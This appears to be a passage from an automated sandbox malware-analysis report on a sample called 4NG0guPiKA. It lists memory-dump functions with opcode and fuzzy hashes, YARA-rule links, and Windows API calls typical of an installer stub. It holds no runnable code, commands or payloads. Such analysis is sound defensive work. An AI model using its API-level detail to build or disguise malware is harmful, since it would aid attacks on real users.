                                                                                                            • Opcode Fuzzy Hash: 651983635736e6b2c13e3d62fcc80bbdd74969bf0cf6d04c44dff3ae571a32e8
                                                                                                            • Instruction Fuzzy Hash: 96C1BD78E00318CFEB14DFA9C994B9DBBB2AF89300F1081A9D409BB355DB759A85CF54
                                                                                                            Function 35F236C0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 62b28dfc00b773e2037d77148f76cdcb04f8631f9e64d2c5c17d29c6700e29e2
                                                                                                            • Instruction ID: fb7d6362d623be51ee4e91d55bc166ccf0cd822b0f1e69983cc4eac84be05ec5
                                                                                                            • Opcode Fuzzy Hash: 62b28dfc00b773e2037d77148f76cdcb04f8631f9e64d2c5c17d29c6700e29e2
                                                                                                            • Instruction Fuzzy Hash: 44C1AF78E00318CFDB14DFA9C994B9DBBB2AB89300F1081A9D409BB395DB759A85CF54
                                                                                                            Function 35F25660 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4ddfa73acb123142464398363262bb0a2f9e58889b547f8436b8896a316835ca
                                                                                                            • Instruction ID: 7b2fc05aa59b0a96421d0cc29d6fc0022f8bba398272d4c61b687300b8d0ba40
                                                                                                            • Opcode Fuzzy Hash: 4ddfa73acb123142464398363262bb0a2f9e58889b547f8436b8896a316835ca
                                                                                                            • Instruction Fuzzy Hash: FBC1AE78E00318CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A85CF54
                                                                                                            Function 35F22E10 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8e3eb9151a3602c25a20800c3afa01190b082e846cd44bb1df91fd16210ce959
                                                                                                            • Instruction ID: c59d825fe358f1250f6a11850c240e6b6b827d6759f7765b949b37f92ffb80ed
                                                                                                            • Opcode Fuzzy Hash: 8e3eb9151a3602c25a20800c3afa01190b082e846cd44bb1df91fd16210ce959
                                                                                                            • Instruction Fuzzy Hash: 17C1BF78E00358CFDB14DFA9C994B9DBBB2BB89300F1081A9D409BB395DB359A85CF14
                                                                                                            Function 35F229B8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 230d6a9c714542d0b2e9030b02b15809942ce0f6d6c355fc6d0d68c1ce713c70
                                                                                                            • Instruction ID: c796f2b892230162d1d409f8d64f44ec06a3ff3521578438aff51acd5d00b30d
                                                                                                            • Opcode Fuzzy Hash: 230d6a9c714542d0b2e9030b02b15809942ce0f6d6c355fc6d0d68c1ce713c70
                                                                                                            • Instruction Fuzzy Hash: 50C1AE78E00258CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A85CF14
                                                                                                            Function 35F22108 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 417331bbee76d3a98bfcac508686336d18b2cf4ce08ecde0e67f773980c4b2de
                                                                                                            • Instruction ID: 2d39ecba9290a941f88307fcfbc5f650c52412f450168482840b3fbc4662296c
                                                                                                            • Opcode Fuzzy Hash: 417331bbee76d3a98bfcac508686336d18b2cf4ce08ecde0e67f773980c4b2de
                                                                                                            • Instruction Fuzzy Hash: 89C1AE78E00358CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A85CF14
                                                                                                            Function 35F27070 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9f196d2f5e892d50a085d118b952e57453e526075d022f9c273e6446f78cdbf5
                                                                                                            • Instruction ID: 7b8b2cd2e5f3102e7f437d9fb6988426ebc4dbb6f1c1bb8c4d964a3edec2da2e
                                                                                                            • Opcode Fuzzy Hash: 9f196d2f5e892d50a085d118b952e57453e526075d022f9c273e6446f78cdbf5
                                                                                                            • Instruction Fuzzy Hash: 0BC1AE78E01318CFEB14DFA9C994B9DBBB2AF89300F1081A9D409BB355DB359A85CF54
                                                                                                            Function 35F21858 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 44853bffe421f5f0270b1d4bec1a4570d520d12c289b83f73b0ecc210a8d442c
                                                                                                            • Instruction ID: edba836747228c8c96095007acdddec83759dfc2029fe127ae884fb6cfe31a58
                                                                                                            • Opcode Fuzzy Hash: 44853bffe421f5f0270b1d4bec1a4570d520d12c289b83f73b0ecc210a8d442c
                                                                                                            • Instruction Fuzzy Hash: 27C1AE78E00358CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB359A85CF54
                                                                                                            Function 35F243C8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c49e2d27e666b0f98794ae0f1bb24e56a40ed951774664979e95ba4440cbad0b
                                                                                                            • Instruction ID: 7e06e6c0a99762935d7ea421329d9723d99d9c15698b0b2c32d4ae268c1d60f3
                                                                                                            • Opcode Fuzzy Hash: c49e2d27e666b0f98794ae0f1bb24e56a40ed951774664979e95ba4440cbad0b
                                                                                                            • Instruction Fuzzy Hash: 70C1AE78E00258CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A81CF14
                                                                                                            Function 35F26368 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f431f52d7c5bc0493a9e8d170fea7b85717492ec807677275b44d1f89c051733
                                                                                                            • Instruction ID: d88fb68223d34c1aa71bfd6f50e2263622080b9b7ec71e9b6f668a56017ccdc9
                                                                                                            • Opcode Fuzzy Hash: f431f52d7c5bc0493a9e8d170fea7b85717492ec807677275b44d1f89c051733
                                                                                                            • Instruction Fuzzy Hash: 79C1AE78E00358CFEB14DFA9C994B9DBBB2AB89300F1081A9D409BB355DB359A81CF54
                                                                                                            Function 35F23B18 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ed79127b65fa617f64ed69414a81d1cd5538a4a8816e9f52588004dd0fbb0a11
                                                                                                            • Instruction ID: ac73e84a5852685bedb4d65a9a1d9a05877e3f772bbd79714c463cbc0bd75a30
                                                                                                            • Opcode Fuzzy Hash: ed79127b65fa617f64ed69414a81d1cd5538a4a8816e9f52588004dd0fbb0a11
                                                                                                            • Instruction Fuzzy Hash: 1FC1BF74E00358CFDB14DFA9C994B9DBBB2BB89300F1081A9D409BB395DB759A85CF14
                                                                                                            Function 35F25AB8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e97d3644b3b55e87ab382b893d621db1a80fb4adbc4b0f6cf8cdcec69ba0ab97
                                                                                                            • Instruction ID: 33ec0dd5d0b5801fc40636c24da42ccf86fa49c5be9f6390d6a70dee0441e39f
                                                                                                            • Opcode Fuzzy Hash: e97d3644b3b55e87ab382b893d621db1a80fb4adbc4b0f6cf8cdcec69ba0ab97
                                                                                                            • Instruction Fuzzy Hash: B0C1BE78E00318CFDB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A85CF54
                                                                                                            Function 35F23268 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0db3084b1d7dcae003f1320d0ceac50e94c6b9716d113ef1da1f686277b0737c
                                                                                                            • Instruction ID: 32fd2d63f7c8ef871a05b7c1bc82f666c81a25c4cd2b8426926c16a2a8af1082
                                                                                                            • Opcode Fuzzy Hash: 0db3084b1d7dcae003f1320d0ceac50e94c6b9716d113ef1da1f686277b0737c
                                                                                                            • Instruction Fuzzy Hash: B6C1AF74E00358CFDB14DFA9C994B9DBBB2BB89300F1081A9D409BB395DB359A85CF14
                                                                                                            Function 35F25208 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d58ec96d618f56c2dcc31b90239379804705407894a36105f3b7c732f3348391
                                                                                                            • Instruction ID: 495b32bad8522292c0f99c7f88fa7bd17d64e23c68e0f46092b83e483ffecc18
                                                                                                            • Opcode Fuzzy Hash: d58ec96d618f56c2dcc31b90239379804705407894a36105f3b7c732f3348391
                                                                                                            • Instruction Fuzzy Hash: F2C1A078E00358CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A85CF14
                                                                                                            Function 331EC1F2 Relevance: .3, Instructions: 267COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f5b254fda1c5f86a102704fb9b550bdaffd79622f386aaf0aa674ddd0634cee1
                                                                                                            • Instruction ID: 4834bc8a0c74ecb6c62536e19f41f23ec2234aaf4cad8d026d3cea6f794c5129
                                                                                                            • Opcode Fuzzy Hash: f5b254fda1c5f86a102704fb9b550bdaffd79622f386aaf0aa674ddd0634cee1
                                                                                                            • Instruction Fuzzy Hash: A9C19D74E00358CFEB14DFA9C994B9DBBB2AF89300F2081A9D409BB355DB359A85CF54
                                                                                                            Function 331EB944 Relevance: .3, Instructions: 265COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3844615d2cb9e472d5a5a12195face68f1766b20da3192d1dd94fb5eb6a21fb6
                                                                                                            • Instruction ID: 0de3b58f85f8d362d49fe1851d50e46062f341df27f85f5ab646d6335d2d579c
                                                                                                            • Opcode Fuzzy Hash: 3844615d2cb9e472d5a5a12195face68f1766b20da3192d1dd94fb5eb6a21fb6
                                                                                                            • Instruction Fuzzy Hash: 14C19D74E01218CFEB14DFA9C994B9DBBB2BF89300F2081A9D409BB355DB359A85CF54
                                                                                                            Function 331EB4EC Relevance: .3, Instructions: 265COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 76dbe83a5de802571f6da02f38a835c82aaabb2b51fbeeb61ce874ab82a1627d
                                                                                                            • Instruction ID: bb19691eb4dfd721c434ab59959f92400a74a3094634e52063f420e0adf8ce2c
                                                                                                            • Opcode Fuzzy Hash: 76dbe83a5de802571f6da02f38a835c82aaabb2b51fbeeb61ce874ab82a1627d
                                                                                                            • Instruction Fuzzy Hash: 6AC19E74E01318CFEB14DFA9C994B9DBBB2AF89300F2081A9D409BB355DB359A85CF54
                                                                                                            Function 004052D3 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                                            • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                                                              • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                                            • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                                            • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                                            • CreatePopupMenu.USER32 ref: 00405562
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405596
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                                            • EmptyClipboard.USER32 ref: 004055FD
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                                            • CloseClipboard.USER32 ref: 00405658
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: {
                                                                                                            • API String ID: 590372296-366298937
                                                                                                            • Opcode ID: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                                            • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                                            • Opcode Fuzzy Hash: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                                            • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                                            Function 00403C57 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                            • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                            • DestroyWindow.USER32 ref: 00403CC4
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                                            • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                                            • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 184305955-0
                                                                                                            • Opcode ID: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                                            • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                            • Opcode Fuzzy Hash: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                                            • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E
                                                                                                            Function 004038B4 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 216stringregistrylibraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                              • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                              • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                            • lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,774D3420,00000000,00434000), ref: 00403935
                                                                                                            • lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B5
                                                                                                            • lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                            • GetFileAttributesW.KERNEL32(00427180), ref: 004039D3
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A1C
                                                                                                              • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                            • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                            • LoadLibraryW.KERNEL32(RichEd20), ref: 00403AED
                                                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                            • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 914957316-1115850852
                                                                                                            • Opcode ID: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                                            • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                            • Opcode Fuzzy Hash: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                                            • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D
                                                                                                            Function 00405C08 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
